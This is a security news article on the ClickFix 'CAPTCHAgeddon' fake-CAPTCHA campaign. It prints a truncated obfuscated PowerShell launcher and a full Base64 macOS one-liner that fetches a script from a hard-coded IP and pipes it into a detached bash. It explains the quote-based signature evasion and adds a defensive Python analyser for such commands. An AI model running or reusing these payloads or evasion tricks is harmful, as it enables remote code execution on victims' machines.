CAPTCHAgeddon – New ClickFix Attack Leverages Fake Captcha to Deliver Malware Payload

A sophisticated new malware campaign has emerged that weaponizes fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands, marking a significant evolution in browser-based attack methodologies.

The technique, dubbed “ClickFix,” is what cybersecurity researchers describe as a next-generation mutation of the fake browser update (ClearFake) scams that dominated the threat landscape throughout 2024; the current fake-CAPTCHA wave is the variant Guardio has named CAPTCHAgeddon.

The attack begins when victims encounter what appears to be a legitimate CAPTCHA verification challenge, complete with familiar Google reCAPTCHA or Cloudflare branding.

However, instead of solving a traditional puzzle, users are instructed to verify their humanity through a series of keyboard shortcuts that ultimately result in the execution of hidden malicious code.

ClearFake to ClickFix to CAPTCHAgeddon (Source – Guardio)

The page’s script silently places a PowerShell command on the victim’s clipboard, then walks them through seemingly harmless steps to “complete verification”: Windows+R opens the Run dialog, Ctrl+V pastes the command, and Enter runs it.

What makes this campaign particularly dangerous is its rapid evolution from simple malvertising to sophisticated, multi-platform operations targeting Windows, macOS, and Linux systems.

Propagation evolution (Source – Guardio)

The attack has displaced earlier fake browser update schemes because nothing is downloaded: no suspicious file ever touches disk, so download warnings and file scanners never fire, and the flow is hosted on trusted infrastructure so it looks legitimate right up to the moment the victim launches the payload themselves.

Guardio researchers identified this campaign as part of their ongoing monitoring of browser-based threats, noting how attackers have refined their approach across three critical dimensions: propagation methods, narrative sophistication, and evasion techniques.

The research team observed the campaign’s migration from basic pop-up advertisements on questionable websites to highly targeted phishing emails impersonating legitimate services like Booking.com.

Technical Evolution and Cross-Platform Expansion

The most concerning aspect of CAPTCHAgeddon is its technical sophistication and cross-platform capabilities.

Fake captcha pages (Source – Guardio)

Initial Windows-focused attacks used heavily obfuscated PowerShell launchers designed to evade signature-based detection. For example, attackers transformed simple commands into variations such as the following (truncated fragment):

POWERSHELL -N"oP"r"OF"I /w h /"COM"ma "$s"r"t15 = 'c"m"b"k"z8b"ui0000"08k"2"2bcm3"b"[3k.info]

Deobfuscation is mechanical: the embedded double quotes are removed by the Windows command-line parser before powershell.exe ever sees its arguments, so -N"oP"r"OF"I is really -NoProfile (powershell.exe accepts any unique prefix of a switch name, and / works as well as -), /w h is -WindowStyle hidden, and /"COM"ma is -Command. A signature keyed on the literal text sees a different string every time while the command that actually executes is unchanged: a straightforward stager that fetches and runs remote code from attacker-controlled infrastructure.

The campaign’s expansion to macOS represents a particularly alarming development, as it exploits the unfamiliarity most Mac users have with command-line interfaces.

The macOS variant instructs victims to open Terminal through Spotlight search and execute Base64-encoded bash commands. A typical macOS payload appears as:

echo "Y3VybCAtcyBodHRwOi8vNDUuMTM1LjIzMi4zMy9kL3JvYmVydG84NTg2NiB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

Decoded, the Base64 blob is a curl -s request to a hard-coded IP address piped straight into nohup bash &: the script is fetched silently, executed without ever being written to disk, and detached from the Terminal session so that closing the window does not stop it. The article attributes the hosting to compromised servers.
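As an added example (not Guardio's code, and not part of the campaign), the analyser below peels the Base64 stage off the macOS one-liner printed above and extracts what it actually runs: the fetch URL and host, and the download-and-execute indicators (silent curl, pipe into a shell, nohup/& backgrounding, IP-literal host). It goes a little beyond the page's single sample by unwrapping nested echo | base64 -d stages and recognising wget as well as curl; the regular expressions are simplifying assumptions, not a shell parser, and nothing here contacts the decoded URL.

```python
"""Peel the base64 stage(s) off a ClickFix-style macOS one-liner and pull the
download-and-execute indicators out of the command that finally runs.

Added example for this article; not Guardio's code. SAMPLE is the macOS
payload exactly as printed. The regexes are assumptions: an echo|base64
staging pattern, a curl/wget fetch and a pipe into (nohup) sh/bash/zsh.
Nothing here performs any network request.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

SAMPLE = ('echo "Y3VybCAtcyBodHRwOi8vNDUuMTM1LjIzMi4zMy9kL3JvYmVydG84NTg2NiB8IG5vaHVwIGJhc2ggJg==" '
          '| base64 -d | bash')

# `echo <b64> | base64 -d` (-D is the older macOS spelling, --decode the GNU one)
STAGE_RE = re.compile(r'echo\s+["\']?([A-Za-z0-9+/=]+)["\']?\s*\|\s*base64\s+(?:-d|-D|--decode)\b')
URL_RE = re.compile(r'https?://[^\s|;&\'"<>]+')
PIPE_TO_SHELL_RE = re.compile(r'\|\s*(?:nohup\s+)?(?:ba|z)?sh\b')
IPV4_RE = re.compile(r'\d{1,3}(\.\d{1,3}){3}')


def unwrap_stages(cmd: str, max_depth: int = 5) -> list:
    """Return [outer, decoded, decoded-of-decoded, ...] until no base64 stage is left."""
    stages = [cmd]
    for _ in range(max_depth):
        m = STAGE_RE.search(stages[-1])
        if not m:
            break
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break   # not really base64: stop and report what we have
        stages.append(inner.strip())
    return stages


def analyse(cmd: str) -> dict:
    """Decode the staging and score the final command for fetch-and-execute behaviour."""
    stages = unwrap_stages(cmd)
    final = stages[-1]
    urls = URL_RE.findall(final)
    hosts = [urlparse(u).hostname for u in urls]
    indicators = []
    if len(stages) > 1:
        indicators.append(f"{len(stages) - 1} base64 stage(s)")
    if re.search(r'\b(curl|wget)\b', final) and PIPE_TO_SHELL_RE.search(final):
        indicators.append("fetch piped into shell (nothing written to disk)")
    if re.search(r'\bcurl\b[^|]*\s-[a-zA-Z]*s', final):
        indicators.append("silent curl (-s)")
    if "nohup" in final or final.rstrip().endswith("&"):
        indicators.append("detached / backgrounded")
    if any(IPV4_RE.fullmatch(h or "") for h in hosts):
        indicators.append("IP-literal host")
    return {"stages": stages, "final": final, "urls": urls, "hosts": hosts, "indicators": indicators}


if __name__ == "__main__":
    for k, v in analyse(SAMPLE).items():
        print(f"{k}: {v}")
```

On the article's sample this reports two stages, a final command of curl -s http://45.135.232.33/d/roberto85866 | nohup bash &, the IP-literal host, and all four behavioural indicators. Feeding the same function the command-line field of process-creation telemetry (Terminal or bash as the parent, a user-typed echo ... | base64 -d | bash) is the practical use: the decision rests on what the decoded command does, not on the opaque Base64 text.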

Compromised WordPress sites delivering Fake Captcha (Source – Guardio)

The attackers have also begun hosting their malicious captcha flows on Google Apps Script (script.google.com), exploiting Google’s trusted domain reputation to slip past URL-based security filters while keeping the appearance of a legitimate verification process.

Evasion evolution (Source – Guardio)

The campaign’s infrastructure analysis reveals highly organized operations, with clustering analysis identifying distinct attacker groups using consistent command patterns and domain structures.

One notable cluster consistently employed clean PowerShell syntax with .run and .press top-level domains, suggesting automated toolkit usage rather than manual campaign development.


The post CAPTCHAgeddon – New ClickFix Attack Leverages Fake Captcha to Deliver Malware Payload appeared first on Cyber Security News.